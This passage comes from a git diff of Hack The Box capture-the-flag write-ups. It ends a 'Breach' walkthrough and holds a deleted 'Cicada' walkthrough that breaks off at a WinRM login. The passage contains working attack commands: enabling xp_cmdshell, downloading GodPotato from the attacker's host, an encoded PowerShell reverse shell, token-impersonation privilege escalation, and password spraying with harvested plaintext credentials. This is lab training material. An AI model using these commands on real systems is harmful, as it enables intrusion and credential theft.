ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 -[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed database context to 'master'. -[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed language setting to us_english. -[*] ACK: Result: 1 - Microsoft SQL Server 2019 RTM (15.0.2000) -[!] Press help for extra shell commands -SQL (BREACH\Administrator  dbo@master)> SELECT IS_SRVROLEMEMBER('sysadmin'); -     --     -1 -``` - -We are now sysadmin. - -```bash -SQL (BREACH\Administrator  dbo@master)> EXEC sp_configure 'show advanced options', 1; -INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install. -SQL (BREACH\Administrator  dbo@master)> RECONFIGURE -SQL (BREACH\Administrator  dbo@master)> EXEC sp_configure 'xp_cmdshell', 1; -INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install. -SQL (BREACH\Administrator  dbo@master)> RECONFIGURE -SQL (BREACH\Administrator  dbo@master)> EXEC xp_cmdshell 'whoami'; -output               -----------------     -breach\svc_mssql     -NULL -SQL (BREACH\Administrator  dbo@master)> EXEC xp_cmdshell 'whoami /priv' -output                                                                               ---------------------------------------------------------------------------------     -NULL                                                                                 -PRIVILEGES INFORMATION                                                               -----------------------                                                               -NULL                                                                                 -Privilege Name                Description                               State        -============================= ========================================= ========     -SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled     -SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled     -SeMachineAccountPrivilege     Add workstations to domain                Disabled     -SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled      -SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled      -SeImpersonatePrivilege        Impersonate a client after authentication Enabled      -SeCreateGlobalPrivilege       Create global objects                     Enabled      -SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled     -NULL -``` - -We see something that shines in the terminal : -`SeImpersonatePrivilege Impersonate a client after authentication Enabled` which means we can impersonate a priviledged client. - -I downloaded GodPotato-NET4 first to try to inject it via Powershell : - -```bash -SQL (BREACH\Administrator  dbo@master)> exec xp_cmdshell 'powershell -c IWR -Uri http://10.10.14.12/GodPotato-NET4.exe -OutFile C:\Windows\Temp\GodPotato-NET4.exe"'; -output                                                                                                                      ------------------------------------------------------------------------------------------------------------------------     -IWR :         -                                                                                 -                                                                                                                      -                                                   -401 - Unauthorized: Access is denied due to invalid credentials.                                             -                                                                                                                    -                                                                                                                     -                                                                                                                      -                                                                                -
                                                                                                         -
                                                                                 - 

401 - Unauthorized: Access is denied due to invalid credentials.

                                                - 

You do not have permission to view this directory or page using the credentials that you supplied.

              -
                                                                                                         -
                                                                                                                     -                                                                                                                     -                                                                                                                     -At line:1 char:1                                                                                                            -+ IWR -Uri http://10.10.14.12/GodPotato-NET4.exe -OutFile C:\Windows\Te ...                                                 -+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                                     -   + CategoryInfo          : InvalidOperation: (System.Net.HttpWebRequest:HttpWebRequest) [Invoke-WebRequest], WebExc      -  eption                                                                                                                   -   + FullyQualifiedErrorId : WebCmdletWebResponseException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand           -NULL -``` - -This didn't work. First, I didn't have a dedicated http webserver, and second, the syntax. - -```bash ->  cd /home/vagabond/Downloads -sudo python3 -m http.server 8080 -Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ... -10.10.14.12 - - [24/May/2026 17:20:57] "HEAD /GodPotato-NET4.exe HTTP/1.1" 200 - -``` - -200 - Ok means it works. No error 404, it has access to GodPotato. - -This time, we download with certutil on BREACH\Administrator since we can't type root yet : - -```bash -SQL (BREACH\Administrator  dbo@master)> EXEC xp_cmdshell 'type C:\Users\Administrator\Desktop\root.txt'; -output                ------------------     -Access is denied -``` - -```bash -SQL (BREACH\Administrator  dbo@master)> EXEC xp_cmdshell 'certutil -urlcache -split -f http://10.10.14.12:8080/GodPotato-NET4.exe C:\Windows\Temp\gp.exe'; - -output                                                                                   -------------------------------------------------------------------------------------     -****  Online  ****                                                                       - 0000  ...                                                                              - 01cc                                                                                   -CertUtil: -URLCache command FAILED: 0x80190194 (-2145844844 HTTP_E_STATUS_NOT_FOUND)     -CertUtil: Not found (404).                                                               -NULL                                                                                     -SQL (BREACH\Administrator  dbo@master)>   -SQL (BREACH\Administrator  dbo@master)> EXEC xp_cmdshell 'type C:\Users\Administrator\Desktop\root.txt'; -output                ------------------     -Access is denied.     -NULL                  -SQL (BREACH\Administrator  dbo@master)> EXEC xp_cmdshell 'certutil -urlcache -split -f http://10.10.14.12:8080/GodPotato-NET4.exe C:\Windows\Temp\gp.exe'; -output                                                  ----------------------------------------------------     -****  Online  ****                                      - 0000  ...                                             - e000                                                  -CertUtil: -URLCache command completed successfully.     -NULL -``` - -It is now registered at `C:\Windows\Temp\gp.exe` (less noisy, no syntax issues). - -Netcat listener and we reconnect with the ticket and use a Base64 encoded script : - -```bash -nc -lvnp 9001 -``` - -Terminal 2 : - -```bash ->  mssqlclient.py -k -no-pass -windows-auth BREACHDC.breach.vl -Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies   - -[*] Encryption required, switching to TLS -[-] CCache file is not found. Skipping... -[-] invalid principal syntax ->  export KRB5CCNAME=Administrator.ccache -mssqlclient.py -k -no-pass -windows-auth BREACHDC.breach.vl -Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies   - -[*] Encryption required, switching to TLS -[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master -[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english -[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 -[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed database context to 'master'. -[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed language setting to us_english. -[*] ACK: Result: 1 - Microsoft SQL Server 2019 RTM (15.0.2000) -[!] Press help for extra shell commands -SQL (BREACH\Administrator  dbo@master)> EXEC xp_cmdshell 'C:\Windows\Temp\gp.exe -cmd "powershell -nop -w hidden -enc JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AUwBvAGMAawBlAHQAcwAuAFQAQwBQAEMAbABpAGUAbgB0 -ACgAJwAxADAALgAxADAALgAxADQALgAxADIAJwAsADkAMAAwADEAKQA7ACQAcwA9ACQAYwAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAPQAwAC4ALgA2ADUANQAzADUAfAAlACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQA9ACQAcwAuAF -IAZQBhAGQAKAAkAGIALAAwACwAJABiAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewAkAGQAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIALAAwACwA -JABpACkAOwAkAHIAPQAoAGkAZQB4ACAAJABkACAAMgA+ACYAMQB8AE8AdQB0AC0AUwB0AHIAaQBuAGcAKQA7ACQAdAA9ACgAJAByACsAJwBQAFMAIAAnACsAKABwAHcAZAApAC4AUABhAHQAaAArACcAPgAgACcAKQA7ACQAeAA9ACgAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbg -BnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJAB0ACkAOwAkAHMALgBXAHIAaQB0AGUAKAAkAHgALAAwACwAJAB4AC4ATABlAG4AZwB0AGgAKQA7ACQAcwAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwAuAEMAbABvAHMAZQAoACkA"'; -``` - -Then, on the listener : - -```bash -Listening on 0.0.0.0 9001 - -Connection received on 10.129.2.189 57915 -``` - -But no shell. - -We'll try to put godpotato via SMB and then execute it on the Administrator xp_cmdshell : - -```bash ->  smbclient //10.129.2.189/share -U 'svc_mssql%Trustno1' -c 'cd transfer; lcd /home/vagabond/Downloads; put GodPotato-NET4.exe gp.exe; ls' - -putting file GodPotato-NET4.exe as \transfer\gp.exe (123.1 kB/s) (average 123.1 kB/s) - .                                   D        0  Sun May 24 17:55:47 2026 - ..                                  D        0  Sun May 24 15:09:51 2026 - claire.pope                         D        0  Thu Feb 17 12:21:35 2022 - diana.pope                          D        0  Thu Feb 17 12:21:19 2022 - gp.exe                              A    57344  Sun May 24 17:55:47 2026 - julia.wong                          D        0  Thu Apr 17 02:38:12 2025 - scrow.url                           A      103  Sun May 24 15:28:11 2026 -``` - -```bash ->  export KRB5CCNAME=$PWD/Administrator.ccache - ->  mssqlclient.py -k -no-pass -windows-auth BREACHDC.breach.vl - -Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies   - -[*] Encryption required, switching to TLS -[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master -[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english -[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 -[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed database context to 'master'. -[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed language setting to us_english. -[*] ACK: Result: 1 - Microsoft SQL Server 2019 RTM (15.0.2000) -[!] Press help for extra shell commands -SQL (BREACH\Administrator  dbo@master)> EXEC xp_cmdshell 'dir C:\share\transfer\gp.exe'; -output                                                 ---------------------------------------------------     -Volume in drive C has no label.                       -Volume Serial Number is B465-02B6                     -NULL                                                   -Directory of C:\share\transfer                        -NULL                                                   -05/24/2026  03:55 PM            57,344 gp.exe          -              1 File(s)         57,344 bytes          -              0 Dir(s)   6,382,919,680 bytes free -``` - -So it worked. Now, we'll try to exfil root.txt to read it back in SMB : - -```bash -SQL (BREACH\Administrator  dbo@master)> EXEC xp_cmdshell 'C:\share\transfer\gp.exe -cmd "cmd.exe /c copy /Y C:\Users\Administrator\Desktop\root.txt C:\share\transfer\root.txt"'; -output                                                                                     ---------------------------------------------------------------------------------------     -[*] CombaseModule: 0x140730870923264                                                       -[*] DispatchTable: 0x140730873513848                                                       -[*] UseProtseqFunction: 0x140730872806192                                                  -[*] UseProtseqFunctionParamCount: 6                                                        -[*] HookRPC                                                                                -[*] Start PipeServer                                                                       -[*] CreateNamedPipe \\.\pipe\5e306e74-c829-464d-b903-05afdfcf7de4\pipe\epmapper            -[*] Trigger RPCSS                                                                          -[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046                                    -[*] DCOM obj IPID: 00004402-0b38-ffff-55aa-ebf32e30ffc7                                    -[*] DCOM obj OXID: 0x54b320e14e577e4                                                       -[*] DCOM obj OID: 0xd35a87af5158d779                                                       -[*] DCOM obj Flags: 0x281                                                                  -[*] DCOM obj PublicRefs: 0x0                                                               -[*] Marshal Object bytes len: 100                                                          -[*] UnMarshal Object                                                                       -[*] Pipe Connected!                                                                        -[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE                                              -[*] CurrentsImpersonationLevel: Impersonation                                              -[*] Start Search System Token                                                              -[*] PID : 928 Token:0x752  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation     -[*] Find System Token : True                                                               -[*] UnmarshalObject: 0x80070776                                                            -[*] CurrentUser: NT AUTHORITY\SYSTEM                                                       -[*] process start with pid 4060                                                            -       1 file(s) copied.                                                                  -NULL -``` - -The `Impersonation` misconfig worked, now we get the root.txt from svc_mssql's /transfer file, where we transfered it with SYSTEM rights : - -```bash ->  smbclient //10.129.2.189/share -U 'svc_mssql%Trustno1' -c 'get transfer\root.txt root.txt; exit' -getting file \transfer\root.txt of size 32 as root.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec) -``` - -And we read it : - -```bash ->  cat root.txt -fc98f41**********e64345% -``` - -Root flag : fc98f4*************e64345 diff --git a/Cicada HTB [EASY].md b/Cicada HTB [EASY].md deleted file mode 100644 index 67dca96..0000000 --- a/Cicada HTB [EASY].md +++ /dev/null @@ -1,425 +0,0 @@ - -Target : 10.129.231.149 - -Date : 31/05/2026 - -```bash ->  sudo nmap -sC -sV -Pn -O -T4 --min-rate=3000 -p- 10.129.231.149 -Please touch the FIDO authenticator. -Starting Nmap 7.99 ( https://nmap.org ) at 2026-05-31 14:00 +0200 -Nmap scan report for 10.129.231.149 -Host is up (0.090s latency). -Not shown: 65522 filtered tcp ports (no-response) -PORT      STATE SERVICE       VERSION -53/tcp    open  domain        Simple DNS Plus -88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-05-31 19:01:30Z) -135/tcp   open  msrpc         Microsoft Windows RPC -139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn -389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb, Site: Default-First-Site-Name) -|_ssl-date: 2026-05-31T19:03:04+00:00; +6h59m58s from scanner time. -| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb -| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:CICADA-DC.cicada.htb -| Not valid before: 2024-08-22T20:24:16 -|_Not valid after:  2025-08-22T20:24:16 -445/tcp   open  microsoft-ds? -464/tcp   open  kpasswd5? -593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0 -636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb, Site: Default-First-Site-Name) -|_ssl-date: 2026-05-31T19:03:05+00:00; +6h59m58s from scanner time. -| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb -| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:CICADA-DC.cicada.htb -| Not valid before: 2024-08-22T20:24:16 -|_Not valid after:  2025-08-22T20:24:16 -3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb, Site: Default-First-Site-Name) -|_ssl-date: 2026-05-31T19:03:04+00:00; +6h59m58s from scanner time. -| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb -| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:CICADA-DC.cicada.htb -| Not valid before: 2024-08-22T20:24:16 -|_Not valid after:  2025-08-22T20:24:16 -3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb, Site: Default-First-Site-Name) -| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb -| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:CICADA-DC.cicada.htb -| Not valid before: 2024-08-22T20:24:16 -|_Not valid after:  2025-08-22T20:24:16 -|_ssl-date: 2026-05-31T19:03:05+00:00; +6h59m58s from scanner time. -5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) -|_http-server-header: Microsoft-HTTPAPI/2.0 -|_http-title: Not Found -65173/tcp open  msrpc         Microsoft Windows RPC -Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port -Device type: general purpose -Running (JUST GUESSING): Microsoft Windows 2022|10|11|2012|2016 (89%) -OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_10 cpe:/o:microsoft:windows_11 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016 -Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows 10 1703 or Windows 11 21H2 - 23H2 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%) -No exact OS matches for host (test conditions non-ideal). -Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows - -Host script results: -| smb2-security-mode:   -|   3.1.1:   -|_    Message signing enabled and required -|_clock-skew: mean: 6h59m57s, deviation: 0s, median: 6h59m57s -| smb2-time:   -|   date: 2026-05-31T19:02:24 -|_  start_date: N/A - -OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . -Nmap done: 1 IP address (1 host up) scanned in 170.62 seconds ->  echo "cicada.htb 10.129.231.149" | sudo tee -a /etc/hosts -cicada.htb 10.129.231.149 -``` - -This seems to be a classic AD box : LDAP on ports `389/tcp` `636/tcp`, `3268/tcp`, RPC and NetBIOS on `135/tcp` and `139/tcp` respectively, Kerberos on port `88/tcp`, but we also have a http server running on `5985/tcp` and DNS on port `53/tcp`, and SMB 3.1.1 on port `445/tcp`. We also have RPC over HTTP at port `593/tcp`. - -We'll start by looking at the samba shares : - -```bash ->  nxc smb 10.129.231.149 -u guest -p '' --shares --groups --users -SMB         10.129.231.149  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:None) (Null Auth:True) -SMB         10.129.231.149  445    CICADA-DC        [+] cicada.htb\guest:   -SMB         10.129.231.149  445    CICADA-DC        [*] Enumerated shares -SMB         10.129.231.149  445    CICADA-DC        Share           Permissions     Remark -SMB         10.129.231.149  445    CICADA-DC        -----           -----------     ------ -SMB         10.129.231.149  445    CICADA-DC        ADMIN$                          Remote Admin -SMB         10.129.231.149  445    CICADA-DC        C$                              Default share -SMB         10.129.231.149  445    CICADA-DC        DEV                               -SMB         10.129.231.149  445    CICADA-DC        HR              READ              -SMB         10.129.231.149  445    CICADA-DC        IPC$            READ            Remote IPC -SMB         10.129.231.149  445    CICADA-DC        NETLOGON                        Logon server share   -SMB         10.129.231.149  445    CICADA-DC        SYSVOL                          Logon server share   -SMB         10.129.231.149  445    CICADA-DC        [-] [REMOVED] Arg moved to the ldap protocol -``` - -We have a `READ` right as guest on HR. - -```bash ->  smbclient //10.129.231.149/HR -U guest -Password for [WORKGROUP\guest]: -Try "help" to get a list of possible commands. -smb: \> ls - .                                   D        0  Thu Mar 14 13:29:09 2024 - ..                                  D        0  Thu Mar 14 13:21:29 2024 - Notice from HR.txt                  A     1266  Wed Aug 28 19:31:48 2024 - -               4168447 blocks of size 4096. 477862 blocks available -smb: \> get "Notice from HR.txt -getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (5.8 KiloBytes/sec) (average 5.8 KiloBytes/sec) -``` - -We read the text : - -```bash ->  cat "Notice from HR.txt" - -Dear new hire! - -Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure. - -Your default password is: Cicada$M6Corpb*@Lp#nZp!8 - -To change your password: - -1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above. -2. Once logged in, navigate to your account settings or profile settings section. -3. Look for the option to change your password. This will be labeled as "Change Password". -4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters. -5. After changing your password, make sure to save your changes. - -Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password. - -If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb. - -Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team! - -Best regards, -Cicada Corp -``` - -So we have a "default password" : `Cicada$M6Corpb*@Lp#nZp!8` but no username. - -We'll add CICADA-DC.cicada.htb and CICADA-DC to `/etc/hosts/` next to the target IP. - -Now, we need to find the username(s) corresponding to the password. - -```bash ->  nxc smb 10.129.231.149 -d cicada.htb -u guest -p '' --rid-brute 10000 - -SMB         10.129.231.149  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:None) (Null Auth:True) -SMB         10.129.231.149  445    CICADA-DC        [+] cicada.htb\guest:   -SMB         10.129.231.149  445    CICADA-DC        498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup) -SMB         10.129.231.149  445    CICADA-DC        500: CICADA\Administrator (SidTypeUser) -SMB         10.129.231.149  445    CICADA-DC        501: CICADA\Guest (SidTypeUser) -SMB         10.129.231.149  445    CICADA-DC        502: CICADA\krbtgt (SidTypeUser) -SMB         10.129.231.149  445    CICADA-DC        512: CICADA\Domain Admins (SidTypeGroup) -SMB         10.129.231.149  445    CICADA-DC        513: CICADA\Domain Users (SidTypeGroup) -SMB         10.129.231.149  445    CICADA-DC        514: CICADA\Domain Guests (SidTypeGroup) -SMB         10.129.231.149  445    CICADA-DC        515: CICADA\Domain Computers (SidTypeGroup) -SMB         10.129.231.149  445    CICADA-DC        516: CICADA\Domain Controllers (SidTypeGroup) -SMB         10.129.231.149  445    CICADA-DC        517: CICADA\Cert Publishers (SidTypeAlias) -SMB         10.129.231.149  445    CICADA-DC        518: CICADA\Schema Admins (SidTypeGroup) -SMB         10.129.231.149  445    CICADA-DC        519: CICADA\Enterprise Admins (SidTypeGroup) -SMB         10.129.231.149  445    CICADA-DC        520: CICADA\Group Policy Creator Owners (SidTypeGroup) -SMB         10.129.231.149  445    CICADA-DC        521: CICADA\Read-only Domain Controllers (SidTypeGroup) -SMB         10.129.231.149  445    CICADA-DC        522: CICADA\Cloneable Domain Controllers (SidTypeGroup) -SMB         10.129.231.149  445    CICADA-DC        525: CICADA\Protected Users (SidTypeGroup) -SMB         10.129.231.149  445    CICADA-DC        526: CICADA\Key Admins (SidTypeGroup) -SMB         10.129.231.149  445    CICADA-DC        527: CICADA\Enterprise Key Admins (SidTypeGroup) -SMB         10.129.231.149  445    CICADA-DC        553: CICADA\RAS and IAS Servers (SidTypeAlias) -SMB         10.129.231.149  445    CICADA-DC        571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias) -SMB         10.129.231.149  445    CICADA-DC        572: CICADA\Denied RODC Password Replication Group (SidTypeAlias) -SMB         10.129.231.149  445    CICADA-DC        1000: CICADA\CICADA-DC$ (SidTypeUser) -SMB         10.129.231.149  445    CICADA-DC        1101: CICADA\DnsAdmins (SidTypeAlias) -SMB         10.129.231.149  445    CICADA-DC        1102: CICADA\DnsUpdateProxy (SidTypeGroup) -SMB         10.129.231.149  445    CICADA-DC        1103: CICADA\Groups (SidTypeGroup) -SMB         10.129.231.149  445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser) -SMB         10.129.231.149  445    CICADA-DC        1105: CICADA\sarah.dantelia (SidTypeUser) -SMB         10.129.231.149  445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser) -SMB         10.129.231.149  445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser) -SMB         10.129.231.149  445    CICADA-DC        1109: CICADA\Dev Support (SidTypeGroup) -SMB         10.129.231.149  445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser) -``` - -We make a small list of users with `nano /tmp/cusers.txt` : - -```nano - GNU nano 9.0                                                                                     /tmp/cusers.txt                                                                                      Modified    -john.smoulder -sarah.dantelia                 -david.orelious   -michael.wrightson -emily.oscars -``` - -```bash ->  nxc smb 10.129.231.149 -d cicada.htb -u /tmp/cusers.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success -SMB         10.129.231.149  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:None) (Null Auth:True) -SMB         10.129.231.149  445    CICADA-DC        [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE   -SMB         10.129.231.149  445    CICADA-DC        [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE   -SMB         10.129.231.149  445    CICADA-DC        [-] cicada.htb\david.orelious:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE   -SMB         10.129.231.149  445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8   -SMB         10.129.231.149  445    CICADA-DC        [-] cicada.htb\emily.oscars:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE -``` - -So `michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8` it is. - -```bash ->  nxc smb 10.129.231.149 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares --groups --users -SMB         10.129.231.149  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:None) (Null Auth:True) -SMB         10.129.231.149  445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8   -SMB         10.129.231.149  445    CICADA-DC        [*] Enumerated shares -SMB         10.129.231.149  445    CICADA-DC        Share           Permissions     Remark -SMB         10.129.231.149  445    CICADA-DC        -----           -----------     ------ -SMB         10.129.231.149  445    CICADA-DC        ADMIN$                          Remote Admin -SMB         10.129.231.149  445    CICADA-DC        C$                              Default share -SMB         10.129.231.149  445    CICADA-DC        DEV                               -SMB         10.129.231.149  445    CICADA-DC        HR              READ              -SMB         10.129.231.149  445    CICADA-DC        IPC$            READ            Remote IPC -SMB         10.129.231.149  445    CICADA-DC        NETLOGON        READ            Logon server share   -SMB         10.129.231.149  445    CICADA-DC        SYSVOL          READ            Logon server share   -SMB         10.129.231.149  445    CICADA-DC        -Username-                    -Last PW Set-       -BadPW- -Description-                                                 -SMB         10.129.231.149  445    CICADA-DC        Administrator                 2024-08-26 20:08:03 0       Built-in account for administering the computer/domain   -SMB         10.129.231.149  445    CICADA-DC        Guest                         2024-08-28 17:26:56 0       Built-in account for guest access to the computer/domain   -SMB         10.129.231.149  445    CICADA-DC        krbtgt                        2024-03-14 11:14:10 0       Key Distribution Center Service Account   -SMB         10.129.231.149  445    CICADA-DC        john.smoulder                 2024-03-14 12:17:29 1          -SMB         10.129.231.149  445    CICADA-DC        sarah.dantelia                2024-03-14 12:17:29 1          -SMB         10.129.231.149  445    CICADA-DC        michael.wrightson             2024-03-14 12:17:29 0          -SMB         10.129.231.149  445    CICADA-DC        david.orelious                2024-03-14 12:17:29 1       Just in case I forget my password is aRt$Lp#7t*VQ!3   -SMB         10.129.231.149  445    CICADA-DC        emily.oscars                  2024-08-22 21:20:17 1          -SMB         10.129.231.149  445    CICADA-DC        [*] Enumerated 8 local users: CICADA -``` - -And we got a second user/password combination : `david.orelious:aRt$Lp#7t*VQ!3` - -```bash ->  nxc smb 10.129.231.149 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --shares -SMB         10.129.231.149  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:None) (Null Auth:True) -SMB         10.129.231.149  445    CICADA-DC        [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3   -SMB         10.129.231.149  445    CICADA-DC        [*] Enumerated shares -SMB         10.129.231.149  445    CICADA-DC        Share           Permissions     Remark -SMB         10.129.231.149  445    CICADA-DC        -----           -----------     ------ -SMB         10.129.231.149  445    CICADA-DC        ADMIN$                          Remote Admin -SMB         10.129.231.149  445    CICADA-DC        C$                              Default share -SMB         10.129.231.149  445    CICADA-DC        DEV             READ              -SMB         10.129.231.149  445    CICADA-DC        HR              READ              -SMB         10.129.231.149  445    CICADA-DC        IPC$            READ            Remote IPC -SMB         10.129.231.149  445    CICADA-DC        NETLOGON        READ            Logon server share   -SMB         10.129.231.149  445    CICADA-DC        SYSVOL          READ            Logon server share   ->  nxc winrm 10.129.231.149 -u david.orelious -p 'aRt$Lp#7t*VQ!3' -WINRM       10.129.231.149  5985   CICADA-DC        [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)   -WINRM       10.129.231.149  5985   CICADA-DC        [-] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3 -``` - -Looks like we can't get a shell, but swe can `READ` `DEV` with this one. - -```bash ->  smbclient //10.129.231.149/DEV -U 'david.orelious%aRt$Lp#7t*VQ!3' -Try "help" to get a list of possible commands. -smb: \> ls - .                                   D        0  Thu Mar 14 13:31:39 2024 - ..                                  D        0  Thu Mar 14 13:21:29 2024 - Backup_script.ps1                   A      601  Wed Aug 28 19:28:22 2024 - -               4168447 blocks of size 4096. 481542 blocks available -smb: \> get Backup_script.ps1 -getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (0.9 KiloBytes/sec) (average 0.9 KiloBytes/sec) -``` - -```bash ->  cat Backup_script.ps1 - - -$sourceDirectory = "C:\smb" -$destinationDirectory = "D:\Backup" - -$username = "emily.oscars" -$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force -$credentials = New-Object System.Management.Automation.PSCredential($username, $password) -$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss" -$backupFileName = "smb_backup_$dateStamp.zip" -$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName -Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath -Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath" -``` - -We got a new username/password : `emily.oscars:Q!3@Lp#M6b*7t*Vt` - -Maybe we'll have more luck this time. - -```bash ->  nxc winrm 10.129.231.149 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -WINRM       10.129.231.149  5985   CICADA-DC        [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)   -WINRM       10.129.231.149  5985   CICADA-DC        [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt (Pwn3d!) -``` - -And we do. - -```PowerShell ->  evil-winrm -i 10.129.231.149 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/winrm-2.3.9/lib/winrm/psrp/fragment.rb:35: warning: redefining 'object_id' may cause serious problems 